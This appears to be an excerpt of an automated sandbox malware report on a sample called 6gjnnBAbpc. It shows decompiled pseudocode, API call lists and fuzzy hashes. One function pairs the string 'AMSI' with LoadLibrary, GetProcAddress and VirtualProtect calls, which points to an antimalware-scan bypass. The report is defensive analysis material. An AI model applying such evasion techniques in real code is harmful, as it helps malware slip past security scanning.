                                                                                                                                                                                                                                                                                                        				intOrPtr _v20;
                                                                                                                                                                                                                                                                                                        				char* _v24;
                                                                                                                                                                                                                                                                                                        				char* _v28;
                                                                                                                                                                                                                                                                                                        				char _v32;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v52;
                                                                                                                                                                                                                                                                                                        				char* _v56;
                                                                                                                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                                                                                                                                        				char* _t46;
                                                                                                                                                                                                                                                                                                        				signed int _t48;
                                                                                                                                                                                                                                                                                                        				char* _t49;
                                                                                                                                                                                                                                                                                                        				void* _t51;
                                                                                                                                                                                                                                                                                                        				char* _t52;
                                                                                                                                                                                                                                                                                                        				int _t53;
                                                                                                                                                                                                                                                                                                        				signed int _t54;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t55;
                                                                                                                                                                                                                                                                                                        				char* _t56;
                                                                                                                                                                                                                                                                                                        				char* _t61;
                                                                                                                                                                                                                                                                                                        				char* _t71;
                                                                                                                                                                                                                                                                                                        				long _t77;
                                                                                                                                                                                                                                                                                                        				char* _t78;
                                                                                                                                                                                                                                                                                                        				char* _t81;
                                                                                                                                                                                                                                                                                                        				signed int _t84;
                                                                                                                                                                                                                                                                                                        				void* _t86;
                                                                                                                                                                                                                                                                                                        				void* _t88;
                                                                                                                                                                                                                                                                                                        				char* _t89;
                                                                                                                                                                                                                                                                                                        				char** _t92;
                                                                                                                                                                                                                                                                                                        				char** _t93;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_t88 = __edi;
                                                                                                                                                                                                                                                                                                        				_t86 = __edx;
                                                                                                                                                                                                                                                                                                        				_t85 = __ecx;
                                                                                                                                                                                                                                                                                                        				_t46 =  *0x422414; // 0xe72568
                                                                                                                                                                                                                                                                                                        				_v28 = 0;
                                                                                                                                                                                                                                                                                                        				_t89 = _a4;
                                                                                                                                                                                                                                                                                                        				_v24 = 0;
                                                                                                                                                                                                                                                                                                        				_v20 = 0xfeedbab1;
                                                                                                                                                                                                                                                                                                        				_v16 = 1;
                                                                                                                                                                                                                                                                                                        				if(_t46 == 0) {
                                                                                                                                                                                                                                                                                                        					_v52 = 0x40ef40;
                                                                                                                                                                                                                                                                                                        					_v56 = 4;
                                                                                                                                                                                                                                                                                                        					 *_t92 = "mtx_pthr_locked_shmem";
                                                                                                                                                                                                                                                                                                        					_t46 = E00414330(__eflags);
                                                                                                                                                                                                                                                                                                        					 *0x422414 = _t46;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				 *_t92 = _t46;
                                                                                                                                                                                                                                                                                                        				E00413FD0();
                                                                                                                                                                                                                                                                                                        				 *_t92 = _t89;
                                                                                                                                                                                                                                                                                                        				_t48 = E004107C0(_t86);
                                                                                                                                                                                                                                                                                                        				_t84 = _t48;
                                                                                                                                                                                                                                                                                                        				if(_t48 == 0) {
                                                                                                                                                                                                                                                                                                        					L4:
                                                                                                                                                                                                                                                                                                        					_t49 =  *0x422414; // 0xe72568
                                                                                                                                                                                                                                                                                                        					if(_t49 == 0) {
                                                                                                                                                                                                                                                                                                        						_v52 = 0x40ef40;
                                                                                                                                                                                                                                                                                                        						_v56 = 4;
                                                                                                                                                                                                                                                                                                        						 *_t92 = "mtx_pthr_locked_shmem";
                                                                                                                                                                                                                                                                                                        						_t49 = E00414330(__eflags);
                                                                                                                                                                                                                                                                                                        						 *0x422414 = _t49;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					 *_t92 = _t49;
                                                                                                                                                                                                                                                                                                        					E00413A00(_t85);
                                                                                                                                                                                                                                                                                                        					_t51 = 3;
                                                                                                                                                                                                                                                                                                        					goto L6;
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					_t52 =  *(_t48 + 0x14);
                                                                                                                                                                                                                                                                                                        					if(_t52 == 0) {
                                                                                                                                                                                                                                                                                                        						goto L4;
                                                                                                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                                                                                                        						_v56 =  &_v32;
                                                                                                                                                                                                                                                                                                        						 *_t92 = _t52;
                                                                                                                                                                                                                                                                                                        						_t53 = GetHandleInformation(??, ??);
                                                                                                                                                                                                                                                                                                        						_t92 = _t92 - 8;
                                                                                                                                                                                                                                                                                                        						if(_t53 != 0) {
                                                                                                                                                                                                                                                                                                        							__eflags =  *(_t84 + 0x24) & 0x00000004;
                                                                                                                                                                                                                                                                                                        							if(( *(_t84 + 0x24) & 0x00000004) == 0) {
                                                                                                                                                                                                                                                                                                        								_t54 = E004102F0(_t84, _t85,  &_v32, _t88, _t89);
                                                                                                                                                                                                                                                                                                        								__eflags = _t54;
                                                                                                                                                                                                                                                                                                        								if(_t54 == 0) {
                                                                                                                                                                                                                                                                                                        									_t55 = 0;
                                                                                                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                                                                                                        									_t55 =  *((intOrPtr*)(_t54 + 0xbc));
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								__eflags = _t89 - _t55;
                                                                                                                                                                                                                                                                                                        								if(_t89 == _t55) {
                                                                                                                                                                                                                                                                                                        									_t56 =  *0x422414; // 0xe72568
                                                                                                                                                                                                                                                                                                        									__eflags = _t56;
                                                                                                                                                                                                                                                                                                        									if(__eflags == 0) {
                                                                                                                                                                                                                                                                                                        										_v52 = 0x40ef40;
                                                                                                                                                                                                                                                                                                        										_v56 = 4;
                                                                                                                                                                                                                                                                                                        										 *_t92 = "mtx_pthr_locked_shmem";
                                                                                                                                                                                                                                                                                                        										_t56 = E00414330(__eflags);
                                                                                                                                                                                                                                                                                                        										 *0x422414 = _t56;
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        									 *_t92 = _t56;
                                                                                                                                                                                                                                                                                                        									E00413A00(_t85);
                                                                                                                                                                                                                                                                                                        									_t51 = 0x24;
                                                                                                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                                                                                                        									__eflags =  *(_t84 + 0x70);
                                                                                                                                                                                                                                                                                                        									if( *(_t84 + 0x70) != 0) {
                                                                                                                                                                                                                                                                                                        										L22:
                                                                                                                                                                                                                                                                                                        										 *_t92 =  *(_t84 + 0x14);
                                                                                                                                                                                                                                                                                                        										CloseHandle(??);
                                                                                                                                                                                                                                                                                                        										_t61 =  *(_t84 + 0x18);
                                                                                                                                                                                                                                                                                                        										_t93 = _t92 - 4;
                                                                                                                                                                                                                                                                                                        										__eflags = _t61;
                                                                                                                                                                                                                                                                                                        										if(_t61 != 0) {
                                                                                                                                                                                                                                                                                                        											 *_t93 = _t61;
                                                                                                                                                                                                                                                                                                        											CloseHandle(??);
                                                                                                                                                                                                                                                                                                        											_t93 = _t93 - 4;
                                                                                                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                                                                                                        										 *(_t84 + 0x18) = 0;
                                                                                                                                                                                                                                                                                                        										__eflags = _a8;
                                                                                                                                                                                                                                                                                                        										if(_a8 != 0) {
                                                                                                                                                                                                                                                                                                        											_t85 = _a8;
                                                                                                                                                                                                                                                                                                        											 *_a8 =  *((intOrPtr*)(_t84 + 4));
                                                                                                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                                                                                                        										_t30 = _t84 + 0x1c; // 0x1c
                                                                                                                                                                                                                                                                                                        										 *_t93 = _t30;
                                                                                                                                                                                                                                                                                                        										E004140E0();
                                                                                                                                                                                                                                                                                                        										 *(_t84 + 0x34) = _v28;
                                                                                                                                                                                                                                                                                                        										__eflags =  *(_t84 + 0xb8);
                                                                                                                                                                                                                                                                                                        										 *(_t84 + 0x38) = _v24;
                                                                                                                                                                                                                                                                                                        										 *((intOrPtr*)(_t84 + 0x3c)) = _v20;
                                                                                                                                                                                                                                                                                                        										 *((intOrPtr*)(_t84 + 0x40)) = _v16;
                                                                                                                                                                                                                                                                                                        										if( *(_t84 + 0xb8) == 0) {
                                                                                                                                                                                                                                                                                                        											E0040FD20(_t84);
                                                                                                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                                                                                                        										_t71 =  *0x422414; // 0xe72568
                                                                                                                                                                                                                                                                                                        										__eflags = _t71;
                                                                                                                                                                                                                                                                                                        										if(__eflags == 0) {
                                                                                                                                                                                                                                                                                                        											_v52 = 0x40ef40;
                                                                                                                                                                                                                                                                                                        											_v56 = 4;
                                                                                                                                                                                                                                                                                                        											 *_t93 = "mtx_pthr_locked_shmem";
                                                                                                                                                                                                                                                                                                        											_t71 = E00414330(__eflags);
                                                                                                                                                                                                                                                                                                        											 *0x422414 = _t71;
                                                                                                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                                                                                                        										 *_t93 = _t71;
                                                                                                                                                                                                                                                                                                        										E00413A00(_t85);
                                                                                                                                                                                                                                                                                                        										E00412210();
                                                                                                                                                                                                                                                                                                        										_t51 = 0;
                                                                                                                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                                                                                                                        										_v56 = 0;
                                                                                                                                                                                                                                                                                                        										 *_t92 =  *(_t84 + 0x14);
                                                                                                                                                                                                                                                                                                        										_t77 = WaitForSingleObject(??, ??);
                                                                                                                                                                                                                                                                                                        										_t92 = _t92 - 8;
                                                                                                                                                                                                                                                                                                        										__eflags = _t77;
                                                                                                                                                                                                                                                                                                        										if(_t77 == 0) {
                                                                                                                                                                                                                                                                                                        											goto L22;
                                                                                                                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                                                                                                                        											_t78 =  *0x422414; // 0xe72568
                                                                                                                                                                                                                                                                                                        											__eflags = _t78;
                                                                                                                                                                                                                                                                                                        											if(__eflags == 0) {
                                                                                                                                                                                                                                                                                                        												_v52 = 0x40ef40;
                                                                                                                                                                                                                                                                                                        												_v56 = 4;
                                                                                                                                                                                                                                                                                                        												 *_t92 = "mtx_pthr_locked_shmem";
                                                                                                                                                                                                                                                                                                        												_t78 = E00414330(__eflags);
                                                                                                                                                                                                                                                                                                        												 *0x422414 = _t78;
                                                                                                                                                                                                                                                                                                        											}
                                                                                                                                                                                                                                                                                                        											 *_t92 = _t78;
                                                                                                                                                                                                                                                                                                        											E00413A00(_t85);
                                                                                                                                                                                                                                                                                                        											E00412210();
                                                                                                                                                                                                                                                                                                        											_t51 = 0x10;
                                                                                                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								L6:
                                                                                                                                                                                                                                                                                                        								return _t51;
                                                                                                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                                                                                                        								_t81 =  *0x422414; // 0xe72568
                                                                                                                                                                                                                                                                                                        								__eflags = _t81;
                                                                                                                                                                                                                                                                                                        								if(__eflags == 0) {
                                                                                                                                                                                                                                                                                                        									_v52 = 0x40ef40;
                                                                                                                                                                                                                                                                                                        									_v56 = 4;
                                                                                                                                                                                                                                                                                                        									 *_t92 = "mtx_pthr_locked_shmem";
                                                                                                                                                                                                                                                                                                        									_t81 = E00414330(__eflags);
                                                                                                                                                                                                                                                                                                        									 *0x422414 = _t81;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								 *_t92 = _t81;
                                                                                                                                                                                                                                                                                                        								E00413A00(_t85);
                                                                                                                                                                                                                                                                                                        								return 0x16;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							goto L4;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        			}


































                                                                                                                                                                                                                                                                                                        0x00412ec0
                                                                                                                                                                                                                                                                                                        0x00412ec0
                                                                                                                                                                                                                                                                                                        0x00412ec0
                                                                                                                                                                                                                                                                                                        0x00412ec8
                                                                                                                                                                                                                                                                                                        0x00412ecd
                                                                                                                                                                                                                                                                                                        0x00412ed4
                                                                                                                                                                                                                                                                                                        0x00412ed7
                                                                                                                                                                                                                                                                                                        0x00412ede
                                                                                                                                                                                                                                                                                                        0x00412ee7
                                                                                                                                                                                                                                                                                                        0x00412eee
                                                                                                                                                                                                                                                                                                        0x00412f93
                                                                                                                                                                                                                                                                                                        0x00412f9b
                                                                                                                                                                                                                                                                                                        0x00412fa3
                                                                                                                                                                                                                                                                                                        0x00412faa
                                                                                                                                                                                                                                                                                                        0x00412faf
                                                                                                                                                                                                                                                                                                        0x00412faf
                                                                                                                                                                                                                                                                                                        0x00412ef4
                                                                                                                                                                                                                                                                                                        0x00412ef7
                                                                                                                                                                                                                                                                                                        0x00412efc
                                                                                                                                                                                                                                                                                                        0x00412eff
                                                                                                                                                                                                                                                                                                        0x00412f06
                                                                                                                                                                                                                                                                                                        0x00412f08
                                                                                                                                                                                                                                                                                                        0x00412f28
                                                                                                                                                                                                                                                                                                        0x00412f28
                                                                                                                                                                                                                                                                                                        0x00412f2f
                                                                                                                                                                                                                                                                                                        0x00412f70
                                                                                                                                                                                                                                                                                                        0x00412f78
                                                                                                                                                                                                                                                                                                        0x00412f80
                                                                                                                                                                                                                                                                                                        0x00412f87
                                                                                                                                                                                                                                                                                                        0x00412f8c
                                                                                                                                                                                                                                                                                                        0x00412f8c
                                                                                                                                                                                                                                                                                                        0x00412f31
                                                                                                                                                                                                                                                                                                        0x00412f34
                                                                                                                                                                                                                                                                                                        0x00412f39
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00412f0a
                                                                                                                                                                                                                                                                                                        0x00412f0a
                                                                                                                                                                                                                                                                                                        0x00412f0f
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00412f11
                                                                                                                                                                                                                                                                                                        0x00412f14
                                                                                                                                                                                                                                                                                                        0x00412f18
                                                                                                                                                                                                                                                                                                        0x00412f1b
                                                                                                                                                                                                                                                                                                        0x00412f21
                                                                                                                                                                                                                                                                                                        0x00412f26
                                                                                                                                                                                                                                                                                                        0x00412f45
                                                                                                                                                                                                                                                                                                        0x00412f49
                                                                                                                                                                                                                                                                                                        0x00412fc0
                                                                                                                                                                                                                                                                                                        0x00412fc5
                                                                                                                                                                                                                                                                                                        0x00412fc7
                                                                                                                                                                                                                                                                                                        0x004130e6
                                                                                                                                                                                                                                                                                                        0x00412fcd
                                                                                                                                                                                                                                                                                                        0x00412fcd
                                                                                                                                                                                                                                                                                                        0x00412fcd
                                                                                                                                                                                                                                                                                                        0x00412fd3
                                                                                                                                                                                                                                                                                                        0x00412fd5
                                                                                                                                                                                                                                                                                                        0x00413047
                                                                                                                                                                                                                                                                                                        0x0041304c
                                                                                                                                                                                                                                                                                                        0x0041304e
                                                                                                                                                                                                                                                                                                        0x004130ed
                                                                                                                                                                                                                                                                                                        0x004130f5
                                                                                                                                                                                                                                                                                                        0x004130fd
                                                                                                                                                                                                                                                                                                        0x00413104
                                                                                                                                                                                                                                                                                                        0x00413109
                                                                                                                                                                                                                                                                                                        0x00413109
                                                                                                                                                                                                                                                                                                        0x00413054
                                                                                                                                                                                                                                                                                                        0x00413057
                                                                                                                                                                                                                                                                                                        0x0041305c
                                                                                                                                                                                                                                                                                                        0x00412fd7
                                                                                                                                                                                                                                                                                                        0x00412fda
                                                                                                                                                                                                                                                                                                        0x00412fdc
                                                                                                                                                                                                                                                                                                        0x00413066
                                                                                                                                                                                                                                                                                                        0x0041306f
                                                                                                                                                                                                                                                                                                        0x00413072
                                                                                                                                                                                                                                                                                                        0x00413074
                                                                                                                                                                                                                                                                                                        0x00413077
                                                                                                                                                                                                                                                                                                        0x0041307a
                                                                                                                                                                                                                                                                                                        0x0041307c
                                                                                                                                                                                                                                                                                                        0x0041307e
                                                                                                                                                                                                                                                                                                        0x00413081
                                                                                                                                                                                                                                                                                                        0x00413083
                                                                                                                                                                                                                                                                                                        0x00413083
                                                                                                                                                                                                                                                                                                        0x00413089
                                                                                                                                                                                                                                                                                                        0x00413090
                                                                                                                                                                                                                                                                                                        0x00413092
                                                                                                                                                                                                                                                                                                        0x00413097
                                                                                                                                                                                                                                                                                                        0x0041309a
                                                                                                                                                                                                                                                                                                        0x0041309a
                                                                                                                                                                                                                                                                                                        0x0041309c
                                                                                                                                                                                                                                                                                                        0x0041309f
                                                                                                                                                                                                                                                                                                        0x004130a2
                                                                                                                                                                                                                                                                                                        0x004130b0
                                                                                                                                                                                                                                                                                                        0x004130b6
                                                                                                                                                                                                                                                                                                        0x004130b8
                                                                                                                                                                                                                                                                                                        0x004130be
                                                                                                                                                                                                                                                                                                        0x004130c4
                                                                                                                                                                                                                                                                                                        0x004130c7
                                                                                                                                                                                                                                                                                                        0x00413138
                                                                                                                                                                                                                                                                                                        0x00413138
                                                                                                                                                                                                                                                                                                        0x004130c9
                                                                                                                                                                                                                                                                                                        0x004130ce
                                                                                                                                                                                                                                                                                                        0x004130d0
                                                                                                                                                                                                                                                                                                        0x00413113
                                                                                                                                                                                                                                                                                                        0x0041311b
                                                                                                                                                                                                                                                                                                        0x00413123
                                                                                                                                                                                                                                                                                                        0x0041312a
                                                                                                                                                                                                                                                                                                        0x0041312f
                                                                                                                                                                                                                                                                                                        0x0041312f
                                                                                                                                                                                                                                                                                                        0x004130d2
                                                                                                                                                                                                                                                                                                        0x004130d5
                                                                                                                                                                                                                                                                                                        0x004130da
                                                                                                                                                                                                                                                                                                        0x004130df
                                                                                                                                                                                                                                                                                                        0x00412fe2
                                                                                                                                                                                                                                                                                                        0x00412fe2
                                                                                                                                                                                                                                                                                                        0x00412fed
                                                                                                                                                                                                                                                                                                        0x00412ff0
                                                                                                                                                                                                                                                                                                        0x00412ff6
                                                                                                                                                                                                                                                                                                        0x00412ff9
                                                                                                                                                                                                                                                                                                        0x00412ffb
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00412ffd
                                                                                                                                                                                                                                                                                                        0x00412ffd
                                                                                                                                                                                                                                                                                                        0x00413002
                                                                                                                                                                                                                                                                                                        0x00413004
                                                                                                                                                                                                                                                                                                        0x0041313f
                                                                                                                                                                                                                                                                                                        0x00413147
                                                                                                                                                                                                                                                                                                        0x0041314f
                                                                                                                                                                                                                                                                                                        0x00413156
                                                                                                                                                                                                                                                                                                        0x0041315b
                                                                                                                                                                                                                                                                                                        0x0041315b
                                                                                                                                                                                                                                                                                                        0x0041300a
                                                                                                                                                                                                                                                                                                        0x0041300d
                                                                                                                                                                                                                                                                                                        0x00413012
                                                                                                                                                                                                                                                                                                        0x00413017
                                                                                                                                                                                                                                                                                                        0x00413017
                                                                                                                                                                                                                                                                                                        0x00412ffb
                                                                                                                                                                                                                                                                                                        0x00412fdc
                                                                                                                                                                                                                                                                                                        0x00412f3e
                                                                                                                                                                                                                                                                                                        0x00412f44
                                                                                                                                                                                                                                                                                                        0x00412f4b
                                                                                                                                                                                                                                                                                                        0x00412f4b
                                                                                                                                                                                                                                                                                                        0x00412f50
                                                                                                                                                                                                                                                                                                        0x00412f52
                                                                                                                                                                                                                                                                                                        0x00413021
                                                                                                                                                                                                                                                                                                        0x00413029
                                                                                                                                                                                                                                                                                                        0x00413031
                                                                                                                                                                                                                                                                                                        0x00413038
                                                                                                                                                                                                                                                                                                        0x0041303d
                                                                                                                                                                                                                                                                                                        0x0041303d
                                                                                                                                                                                                                                                                                                        0x00412f58
                                                                                                                                                                                                                                                                                                        0x00412f5b
                                                                                                                                                                                                                                                                                                        0x00412f6b
                                                                                                                                                                                                                                                                                                        0x00412f6b
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00412f26
                                                                                                                                                                                                                                                                                                        0x00412f0f

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetHandleInformation.KERNEL32 ref: 00412F1B
                                                                                                                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32 ref: 00412FF0
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: HandleInformationObjectSingleWait
                                                                                                                                                                                                                                                                                                        • String ID: h%
                                                                                                                                                                                                                                                                                                        • API String ID: 77340887-2361359942
                                                                                                                                                                                                                                                                                                        • Opcode ID: d317a26b3cd460a8ecd9a6efaadd092c3b0c37b6c9f4cd4961985edcf548a9ad
                                                                                                                                                                                                                                                                                                        • Instruction ID: 5295104ccd4e77eb4c30db888a1abb3289d5021b4c5d851bebd00781382d59b2
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d317a26b3cd460a8ecd9a6efaadd092c3b0c37b6c9f4cd4961985edcf548a9ad
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4F618EB06043059FDB10EF65D68439ABFF4AF04344F40882EE884DB345D7B8D982CBAA
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CloseHandleValue
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 492146193-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 50172de1c8ccb0a201679019f7e5b868fe7c56b5f502739187e9b9fc105b9909
                                                                                                                                                                                                                                                                                                        • Instruction ID: 807a0fc4849867346c23f955af7b1b9f8301ac30692e4abd2189dee9186e86bd
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 50172de1c8ccb0a201679019f7e5b868fe7c56b5f502739187e9b9fc105b9909
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3F512BB0A04305CFDB10EFA5D58879A7BF4AF04344F01856AD8458B355E7B8E9C5CF9A
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • LoadLibraryExA.KERNEL32(10004070,00000000), ref: 10002509
                                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,10004078), ref: 10002525
                                                                                                                                                                                                                                                                                                        • VirtualProtect.KERNEL32(?,00000004,00000040,?), ref: 10002560
                                                                                                                                                                                                                                                                                                        • VirtualProtect.KERNEL32(?,00000004,?,?), ref: 10002581
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.670998844.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_10001000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                                        • String ID: AMSI
                                                                                                                                                                                                                                                                                                        • API String ID: 3300690313-3828877684
                                                                                                                                                                                                                                                                                                        • Opcode ID: aedc0c72c88739d98e6cc95382061a03d6f4a4626be1828d24e7b39d8783c48f
                                                                                                                                                                                                                                                                                                        • Instruction ID: f7beab1cd16fb010797eaf1f52ccd341b116c57276f54c1637b54f9798f26af1
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: aedc0c72c88739d98e6cc95382061a03d6f4a4626be1828d24e7b39d8783c48f
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1C11DAB5D05209EFEB04CF94CC98BAEBBB4FB48345F108599EA11A7344D770AA40DB55
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 68%
                                                                                                                                                                                                                                                                                                        			E04009290() {
                                                                                                                                                                                                                                                                                                        				char _v8;
                                                                                                                                                                                                                                                                                                        				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                                                                                                                                        				_v12 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "IsWow64Process");
                                                                                                                                                                                                                                                                                                        				if(_v12 != 0) {
                                                                                                                                                                                                                                                                                                        					_v12(GetCurrentProcess(),  &_v8);
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return _v8;
                                                                                                                                                                                                                                                                                                        			}





                                                                                                                                                                                                                                                                                                        0x04009296
                                                                                                                                                                                                                                                                                                        0x040092b4
                                                                                                                                                                                                                                                                                                        0x040092bb
                                                                                                                                                                                                                                                                                                        0x040092c8
                                                                                                                                                                                                                                                                                                        0x040092c8
                                                                                                                                                                                                                                                                                                        0x040092d1

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,IsWow64Process), ref: 040092A7
                                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 040092AE
                                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000000), ref: 040092C1
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: AddressCurrentHandleModuleProcProcess
                                                                                                                                                                                                                                                                                                        • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                                                                                                                                        • API String ID: 4190356694-3024904723
                                                                                                                                                                                                                                                                                                        • Opcode ID: 38042a03575f21376aceb1f4956717d964388ed776961314cc3b8e9b1f133714
